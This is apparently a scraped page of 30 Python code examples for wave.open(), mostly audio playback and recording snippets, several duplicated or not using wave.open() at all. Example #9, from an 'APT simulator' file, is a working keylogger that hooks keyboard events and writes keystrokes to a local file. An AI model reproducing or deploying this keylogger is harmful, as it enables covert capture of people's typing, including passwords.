Python wave.open() Examples
The following are 30
code examples of wave.open().
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example.
You may also want to check out all available functions/classes of the module
wave
, or try the search function
.
Example #1
Source File: proj2_yt_mvp.py From ai-makers-kit with MIT License | 13 votes |
def __enter__(self): self._audio_interface = pyaudio.PyAudio() self._audio_stream = self._audio_interface.open( format=pyaudio.paInt16, channels=1, rate=self._rate, input=True, frames_per_buffer=self._chunk, # Run the audio stream asynchronously to fill the buffer object. # This is necessary so that the input device's buffer doesn't # overflow while the calling thread makes network requests, etc. stream_callback=self._fill_buffer, ) self.closed = False return self #def __exit__(self, type, value, traceback):
Example #2
Source File: snowboydecoder.py From google-assistant-hotword-raspi with MIT License | 11 votes |
def play_audio_file(fname=DETECT_DING): """Simple callback function to play a wave file. By default it plays a Ding sound. :param str fname: wave file name :return: None """ ding_wav = wave.open(fname, 'rb') ding_data = ding_wav.readframes(ding_wav.getnframes()) audio = pyaudio.PyAudio() stream_out = audio.open( format=audio.get_format_from_width(ding_wav.getsampwidth()), channels=ding_wav.getnchannels(), rate=ding_wav.getframerate(), input=False, output=True) stream_out.start_stream() stream_out.write(ding_data) time.sleep(0.2) stream_out.stop_stream() stream_out.close() audio.terminate()
Example #3
Source File: _audio.py From ai-makers-kit with MIT License | 8 votes |
def play_wav(fname, chunk=CHUNK): # create an audio object wf = wave.open(fname, 'rb') p = pyaudio.PyAudio() # open stream based on the wave object which has been input. stream = p.open(format=p.get_format_from_width(wf.getsampwidth()), channels=wf.getnchannels(), rate=wf.getframerate(), output=True) # read data (based on the chunk size) data = wf.readframes(chunk) # play stream (looping from beginning of file to the end) while len(data) > 0: # writing to the stream is what *actually* plays the sound. stream.write(data) data = wf.readframes(chunk) # cleanup stuff stream.close() p.terminate()
Example #4
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 7 votes |
def play_file(fname): # create an audio object wf = wave.open(fname, 'rb') p = pyaudio.PyAudio() chunk = 1024 # open stream based on the wave object which has been input. stream = p.open(format=p.get_format_from_width(wf.getsampwidth()), channels=wf.getnchannels(), rate=wf.getframerate(), output=True) # read data (based on the chunk size) data = wf.readframes(chunk) # play stream (looping from beginning of file to the end) while len(data) > 0: # writing to the stream is what *actually* plays the sound. stream.write(data) data = wf.readframes(chunk) # cleanup stuff. stream.close() p.terminate()
Example #5
Source File: raw_data_loaders.py From ibllib with MIT License | 7 votes |
def load_mic(session_path): """ Load Microphone wav file to np.array of len nSamples :param session_path: Absoulte path of session folder :type session_path: str :return: An array of values of the sound waveform :rtype: numpy.array """ if session_path is None: return path = Path(session_path).joinpath("raw_behavior_data") path = next(path.glob("_iblrig_micData.raw*.wav"), None) if not path: return None fp = wave.open(path) nchan = fp.getnchannels() N = fp.getnframes() dstr = fp.readframes(N * nchan) data = np.frombuffer(dstr, np.int16) data = np.reshape(data, (-1, nchan)) return data
Example #6
Source File: _audio.py From ai-makers-kit with MIT License | 7 votes |
def play_wav(fname, chunk=CHUNK): # create an audio object wf = wave.open(fname, 'rb') p = pyaudio.PyAudio() # open stream based on the wave object which has been input. stream = p.open(format=p.get_format_from_width(wf.getsampwidth()), channels=wf.getnchannels(), rate=wf.getframerate(), output=True) # read data (based on the chunk size) data = wf.readframes(chunk) # play stream (looping from beginning of file to the end) while len(data) > 0: # writing to the stream is what *actually* plays the sound. stream.write(data) data = wf.readframes(chunk) # cleanup stuff stream.close() p.terminate()
Example #7
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText,inFileName): channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials()) stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel) message = gigagenieRPC_pb2.reqText() message.lang=0 message.mode=0 message.text=inText writeFile=open(inFileName,'wb') for response in stub.getText2VoiceStream(message): if response.HasField("resOptions"): print ("ResVoiceResult: %d" %(response.resOptions.resultCd)) if response.HasField("audioContent"): print ("Audio Stream") writeFile.write(response.audioContent) writeFile.close()
Example #8
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText,inFileName): channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials()) stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel) message = gigagenieRPC_pb2.reqText() message.lang=0 message.mode=0 message.text=inText writeFile=open(inFileName,'wb') for response in stub.getText2VoiceStream(message): if response.HasField("resOptions"): print ("ResVoiceResult: %d" %(response.resOptions.resultCd)) if response.HasField("audioContent"): print ("Audio Stream") writeFile.write(response.audioContent) writeFile.close()
Example #9
Source File: apt_simulator.py From hack4career with Apache License 2.0 | 6 votes |
def keylogger(): if console: print "* Logging key events... (press enter to escape)" def OnKeyboardEvent (event): keys = "" full_path = os.path.realpath(__file__) path, file = os.path.split(full_path) path = path + "\keylogs.txt" keyfile = open(path, "a") key = chr(event.Ascii) if event.Ascii == 13: key = "\n" hook.UnhookKeyboard() if console: print "* done\n" main() keys = keys + key keyfile.write(keys) keyfile.close() hook = pyHook.HookManager() hook.KeyDown = OnKeyboardEvent hook.HookKeyboard() pythoncom.PumpMessages()
Example #10
Source File: proj2_yt_mvp.py From ai-makers-kit with MIT License | 6 votes |
def __enter__(self): self._audio_interface = pyaudio.PyAudio() self._audio_stream = self._audio_interface.open( format=pyaudio.paInt16, channels=1, rate=self._rate, input=True, frames_per_buffer=self._chunk, # Run the audio stream asynchronously to fill the buffer object. # This is necessary so that the input device's buffer doesn't # overflow while the calling thread makes network requests, etc. stream_callback=self._fill_buffer, ) self.closed = False return self #def __exit__(self, type, value, traceback):
Example #11
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText,inFileName): channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials()) stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel) message = gigagenieRPC_pb2.reqText() message.lang=0 message.mode=0 message.text=inText writeFile=open(inFileName,'wb') for response in stub.getText2VoiceStream(message): if response.HasField("resOptions"): print ("ResVoiceResult: %d" %(response.resOptions.resultCd)) if response.HasField("audioContent"): print ("Audio Stream") writeFile.write(response.audioContent) writeFile.close()
Example #12
Source File: main.py From HanTTS with MIT License | 6 votes |
def _play_audio(path, delay): try: time.sleep(delay) wf = wave.open(path, 'rb') p = pyaudio.PyAudio() stream = p.open(format=p.get_format_from_width(wf.getsampwidth()), channels=wf.getnchannels(), rate=wf.getframerate(), output=True) data = wf.readframes(TextToSpeech.CHUNK) while data: stream.write(data) data = wf.readframes(TextToSpeech.CHUNK) stream.stop_stream() stream.close() p.terminate() return except: pass
Example #13
Source File: raw_data_loaders.py From ibllib with MIT License | 6 votes |
def load_settings(session_path): """ Load PyBpod Settings files (.json). [description] :param session_path: Absolute path of session folder :type session_path: str :return: Settings dictionary :rtype: dict """ if session_path is None: return path = Path(session_path).joinpath("raw_behavior_data") path = next(path.glob("_iblrig_taskSettings.raw*.json"), None) if not path: return None with open(path, 'r') as f: settings = json.load(f) if 'IBLRIG_VERSION_TAG' not in settings.keys(): settings['IBLRIG_VERSION_TAG'] = '' return settings
Example #14
Source File: models.py From cloud-asr with Apache License 2.0 | 6 votes |
def save_wav(self, chunk_id, model, body, frame_rate): checksum = md5.new(body).hexdigest() directory = "%s/%s" % (model, checksum[:2]) self.create_directories_if_needed(self.path + "/" + directory) path = '%s/%s/%s.wav' % (self.path, directory, checksum) url = '/static/data/%s/%s.wav' % (directory, checksum) wav = wave.open(path, 'w') wav.setnchannels(1) wav.setsampwidth(2) wav.setframerate(frame_rate) wav.writeframes(body) wav.close() return (path, url)
Example #15
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText,inFileName): channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials()) stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel) message = gigagenieRPC_pb2.reqText() message.lang=0 message.mode=0 message.text=inText writeFile=open(inFileName,'wb') for response in stub.getText2VoiceStream(message): if response.HasField("resOptions"): print ("ResVoiceResult: %d" %(response.resOptions.resultCd)) if response.HasField("audioContent"): print ("Audio Stream") writeFile.write(response.audioContent) writeFile.close()
Example #16
Source File: cutoff.py From GST-Tacotron with MIT License | 6 votes |
def cutoff(input_wav, output_wav): ''' input_wav --- input wav file path output_wav --- output wav file path ''' # read input wave file and get parameters. with wave.open(input_wav, 'r') as fw: params = fw.getparams() # print(params) nchannels, sampwidth, framerate, nframes = params[:4] strData = fw.readframes(nframes) waveData = np.fromstring(strData, dtype=np.int16) max_v = np.max(abs(waveData)) for i in range(waveData.shape[0]): if abs(waveData[i]) > 0.08 * max_v: break for j in range(waveData.shape[0] - 1, 0, -1): if abs(waveData[j]) > 0.08 * max_v: break # write new wav file with wave.open(output_wav, 'w') as fw: params = list(params) params[3] = nframes - i - (waveData.shape[0] - 1 - j) fw.setparams(params) fw.writeframes(strData[2 * i:2 * (j + 1)])
Example #17
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText,inFileName): channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials()) stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel) message = gigagenieRPC_pb2.reqText() message.lang=0 message.mode=0 message.text=inText writeFile=open(inFileName,'wb') for response in stub.getText2VoiceStream(message): if response.HasField("resOptions"): print ("ResVoiceResult: %d" %(response.resOptions.resultCd)) if response.HasField("audioContent"): print ("Audio Stream") writeFile.write(response.audioContent) writeFile.close()
Example #18
Source File: proj2_yt_mvp.py From ai-makers-kit with MIT License | 5 votes |
def getCredentials(): with open('../data/ca-bundle.pem', 'rb') as f: trusted_certs = f.read() sslCred = grpc.ssl_channel_credentials(root_certificates=trusted_certs) authCred = grpc.metadata_call_credentials(credentials) return grpc.composite_channel_credentials(sslCred, authCred) ### KWS
Example #19
Source File: audio.py From tensor2tensor with Apache License 2.0 | 5 votes |
def _get_timit(directory): """Extract TIMIT datasets to directory unless directory/timit exists.""" if os.path.exists(os.path.join(directory, "timit")): return assert FLAGS.timit_paths for path in FLAGS.timit_paths.split(","): with tf.gfile.GFile(path) as f: with tarfile.open(fileobj=f, mode="r:gz") as timit_compressed: timit_compressed.extractall(directory)
Example #20
Source File: audio.py From tensor2tensor with Apache License 2.0 | 5 votes |
def _get_audio_data(filepath): # Construct a true .wav file. out_filepath = filepath.strip(".WAV") + ".wav" # Assumes sox is installed on system. Sox converts from NIST SPHERE to WAV. subprocess.call(["sox", filepath, out_filepath]) wav_file = wave.open(open(out_filepath)) frame_count = wav_file.getnframes() byte_array = wav_file.readframes(frame_count) data = [int(b.encode("hex"), base=16) for b in byte_array] return data, frame_count, wav_file.getsampwidth(), wav_file.getnchannels()
Example #21
Source File: lib.py From cloud-asr with Apache License 2.0 | 5 votes |
def load_wav(self, path): wav = wave.open(path, 'r') if wav.getnchannels() != 1: raise Exception('Input wave is not in mono') if wav.getsampwidth() != self.sample_width: raise Exception('Input wave is not in %d Bytes' % self.sample_width) return wav
Example #22
Source File: ex2_getVoice2Text.py From ai-makers-kit with MIT License | 5 votes |
def play_file(fname): # create an audio object wf = wave.open(fname, 'rb') p = pyaudio.PyAudio() chunk = 1024 # open stream based on the wave object which has been input. stream = p.open(format=p.get_format_from_width(wf.getsampwidth()), channels=wf.getnchannels(), rate=wf.getframerate(), output=True) # read data (based on the chunk size) data = wf.readframes(chunk) # play stream (looping from beginning of file to the end) while (data != ''): # writing to the stream is what *actually* plays the sound. stream.write(data) data = wf.readframes(chunk) #print(data) if data == b'': break # cleanup stuff. print('End of audio stream') stream.close() p.terminate()
Example #23
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 5 votes |
def getCredentials(): with open('/home/pi/ai-makers-kit/data/ca-bundle.pem', 'rb') as f: trusted_certs = f.read() sslCred = grpc.ssl_channel_credentials(root_certificates=trusted_certs) authCred = grpc.metadata_call_credentials(credentials) return grpc.composite_channel_credentials(sslCred, authCred) ### END OF COMMON ### # TTS : getText2VoiceStream
Example #24
Source File: proj2_yt_mvp.py From ai-makers-kit with MIT License | 5 votes |
def play_file(fname): # create an audio object wf = wave.open(fname, 'rb') p = pyaudio.PyAudio() chunk = 1024 # open stream based on the wave object which has been input. stream = p.open(format=p.get_format_from_width(wf.getsampwidth()), channels=wf.getnchannels(), rate=wf.getframerate(), output=True) # read data (based on the chunk size) data = wf.readframes(chunk) # play stream (looping from beginning of file to the end) while (data != ''): # writing to the stream is what *actually* plays the sound. stream.write(data) data = wf.readframes(chunk) #print(data) if data == b'': break # cleanup stuff. print('End of audio stream') stream.close() p.terminate() # KWS
Example #25
Source File: ex2_getVoice2Text.py From ai-makers-kit with MIT License | 5 votes |
def getCredentials(): with open('../data/ca-bundle.pem', 'rb') as f: trusted_certs = f.read() sslCred = grpc.ssl_channel_credentials(root_certificates=trusted_certs) authCred = grpc.metadata_call_credentials(credentials) return grpc.composite_channel_credentials(sslCred, authCred) ### END OF COMMON ### ### STT
Example #26
Source File: _audio.py From ai-makers-kit with MIT License | 5 votes |
def __enter__(self): self._audio_interface = pyaudio.PyAudio() self._audio_stream = self._audio_interface.open( format=pyaudio.paInt16, channels=1, rate=self._rate, input=True, frames_per_buffer=self._chunk, # Run the audio stream asynchronously to fill the buffer object. # This is necessary so that the input device's buffer doesn't # overflow while the calling thread makes network requests, etc. stream_callback=self._fill_buffer, ) self.closed = False return self
Example #27
Source File: MicrophoneStream.py From ai-makers-kit with MIT License | 5 votes |
def __enter__(self): self._audio_interface = pyaudio.PyAudio() self._audio_stream = self._audio_interface.open( format=pyaudio.paInt16, channels=1, rate=self._rate, input=True, frames_per_buffer=self._chunk, # Run the audio stream asynchronously to fill the buffer object. # This is necessary so that the input device's buffer doesn't # overflow while the calling thread makes network requests, etc. stream_callback=self._fill_buffer, ) self.closed = False return self
Example #28
Source File: ex2_getVoice2Text.py From ai-makers-kit with MIT License | 5 votes |
def __enter__(self): self._audio_interface = pyaudio.PyAudio() self._audio_stream = self._audio_interface.open( format=pyaudio.paInt16, channels=1, rate=self._rate, input=True, frames_per_buffer=self._chunk, # Run the audio stream asynchronously to fill the buffer object. # This is necessary so that the input device's buffer doesn't # overflow while the calling thread makes network requests, etc. stream_callback=self._fill_buffer, ) self.closed = False return self
Example #29
Source File: _player.py From ai-makers-kit with MIT License | 5 votes |
def play_wav(self, wav_path): """Play audio from the given WAV file. The file should be mono and small enough to load into memory. Args: wav_path: path to the wav file """ wav = wave.open(wav_path, 'r') if wav.getnchannels() != 1: raise ValueError(wav_path + ' is not a mono file') frames = wav.readframes(wav.getnframes()) self.play_bytes(frames, wav.getframerate(), wav.getsampwidth()) wav.close()
Example #30
Source File: _player.py From ai-makers-kit with MIT License | 5 votes |
def load_audio(self, wav_path): wav = wave.open(wav_path, 'r') if wav.getnchannels() != 1: raise ValueError(wav_path + ' is not a mono file') self._loaded_bytes = wav.readframes(wav.getnframes()) self._loaded_samplerate = wav.getframerate() self._loaded_samplewidth = wav.getsampwidth() wav.close()